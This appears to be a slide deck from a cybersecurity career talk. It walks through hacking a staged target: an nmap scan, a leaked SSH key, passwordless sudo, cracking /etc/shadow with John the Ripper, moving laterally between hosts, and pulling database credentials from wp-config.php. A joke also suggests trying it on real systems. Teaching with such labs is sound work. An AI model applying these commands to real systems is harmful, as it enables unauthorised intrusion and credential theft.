CYBER! CYBER! CYBER! CYBER! CYBER! Career Discovery in Cyber Security: a women's Symposium

Who is this person? —Etsy security team. —Spoke here last year —(everything broke, never do live demos!) —been typing on computers for coins for 15+ years

What are we talking about today? TEH SECURITIES

You will need. —A web browser. (we'll assume you have one of these!) —An SSH client. —Unix/Mac: you have SSH, it's the best. —Windows: Putty —nmap: www.nmap.org (optional)

No really, what are we talking about today? —How you actually hax in to real live companies. —Reconnaissance in to systems. —Lateral movement between systems. —REAL LIFE HOW SYSTEMS GET HACKED. —(you can go do this on real live systems, regrettably1) 1 may be illegal. Ask a grown up/lawyer/use a coffee shop.

Targeting evil corporations I have preselected a target as we are time limited. Evil Mega Corp http://www.evilmegacorp.co/ Go look at their website, they're real evil...

Recon! Nmap! download it at www.nmap.org Security tool that everyone uses. Makes a TCP/IP connection to each port on the target host. Will tell you what is at the other end. (can do cool stuff like run scripts at it)

nmap $ nmap -F -T4 -A www.evilmegacorp.co Starting Nmap 6.47 ( http://nmap.org ) Nmap scan report for www.evilmegacorp.co (45.55.197.171) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: WordPress 4.2.3 | http-robots.txt: 1 disallowed entry |_/ |_http-title: Evil Mega Corp | The most evil of mega corporations

More recon Maybe there's something else, never give up. Let's go look at their website. http://blog.evilmegacorp.co/about-us/ (Hint: I think Dave has a useful link)

Dotfiles! They're the files that start with a dot. % ls -laR -rw-r--r-- 1 discostu staff 88 26 Jun 13:37 .bash_history -rw-r--r-- 1 discostu staff 631 8 Apr 2014 .bash_profile -rw-r--r-- 1 discostu staff 16993 23 Jul 19:29 .vimrc .ssh: total 2024 -rw------- 1 discostu staff 312 30 May 10:59 authorized_keys -rw-r--r-- 1 discostu staff 2595 23 Jul 17:34 known_hosts -rw------- 1 discostu staff 1264 9 Apr 2014 id_rsa Prior art: GitRob and a Forbes article and Dotfiles on Wikipedia

No content

No content

No content

Using SSH keys with SSH Windows: Guide on DigitalOcean.com Linux/OSX/"Unix": ssh -i ~/Downloads/ id_rsa.txt [email protected] Username: dave hostname/IP: crush-it-bro.mooo.com 104.236.53.106 keyfile:

Permission denied (but it's going to be okay)

$ ssh -i ~/Downloads/id_rsa.txt [email protected] Welcome to Ubuntu 14.04.2 LTS (GNU/Linux 3.13.0-57-generic x86_64) * Documentation: https://help.ubuntu.com/ System information as of Sun Jul 26 03:02:12 EDT 2015 System load: 0.0 Processes: 67 Usage of /: 9.2% of 19.56GB Users logged in: 0 Memory usage: 14% IP address for eth0: 104.236.53.106 Swap usage: 0% IP address for eth1: 10.132.233.155 dave@boing:~$ cat .bash_history id ls ls -la vi .bash_profile ssh 10.132.236.169 dave@boing:~$

Cool story, now what can I do. dave@boing:~$ sudo -ln .... User dave may run the following commands on boing: (root) NOPASSWD: ALL WAIT WHAT? I can run sudo -s to get root WITH NO PASSWORD! COOL !

Password cracking 101 root@boing:~# egrep -v 'dave:' /etc/shadow dave:$1$heh$lZPrLI4ejKHiH6/okTMBQ.:16639:0:99999:7::: John the ripper docs. hashcat, which is similar, but newer. ArsTechnica article on how to crack passwords. SkullSecurity wiki page on passwords.

John the ripper You give john a big list of words, it will try them all and see if any match. root@boing# rm -f /root/.john/john.pot root@boing# john --wordlist=/usr/share/dict/wordlist.txt /etc/shadow Loaded 1 password hash (md5crypt [MD5 32/64 X2]) Press 'q' or Ctrl-C to abort, almost any other key for status yay dogs (dave) 1g 0:00:00:27 100% 0.03673g/s 10733p/s 10733c/s 10733C/s yay dogs

HACK THE GIBSON Using the .ssh/known_hosts trickery from before combined with the password, what do we get? dave@boing:~$ cat .ssh/known_hosts 10.132.236.169 ecdsa-sha2-nistp256 AAAAE2VjZ.... dave@boing:~$ ssh 10.132.236.169 [email protected]'s password: dave@wordy:~$ id uid=1000(dave) gid=1000(dave) groups=1000(dave)

Wordpress? dave@wordy:~$ ls /var/www/html/ index.php wp-comments-post.php wp-load.php wp-config.php wp-login.php wp-config-sample.php wp-mail.php readme.html wp-content wp-settings.php wp-activate.php wp-cron.php wp-signup.php wp-admin wp-includes wp-trackback.php wp-blog-header.php wp-links-opml.php

I wonder... dave@wordy:~$ cd /var/www/html/ dave@wordy:/var/www/html$ ls -oh wp-config.php -rw-r--r-- 1 www-data 2.7K Jul 22 16:22 wp-config.php Wait, we can read the config file!? ! " #

MAD HAX dave@wordy:~$ grep DB_ /var/www/html/wp-config.php define('DB_NAME', 'wordpress'); define('DB_USER', 'wordpress'); define('DB_PASSWORD', 'QNqJgIJD39'); define('DB_HOST', 'localhost'); ... So now we have the database password!

I've got the key, I've got the secret mysql -Dwordpress -uwordpress -pQNqJgIJD39 You now have full control of the database for all of Wordpress for the site. !!!!

What to do? root@localhost) [wordpress]> select * from wp_options where option_value like 'Evil Mega Corp'; +-----------+-------------+----------------+----------+ | option_id | option_name | option_value | autoload | +-----------+-------------+----------------+----------+ | 3 | blogname | Evil Mega Corp | yes | +-----------+-------------+----------------+----------+ 1 row in set (0.00 sec) (root@localhost) [wordpress]> update wp_options set option_value='Yay happy kittens' where option_id = 3; Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0

No content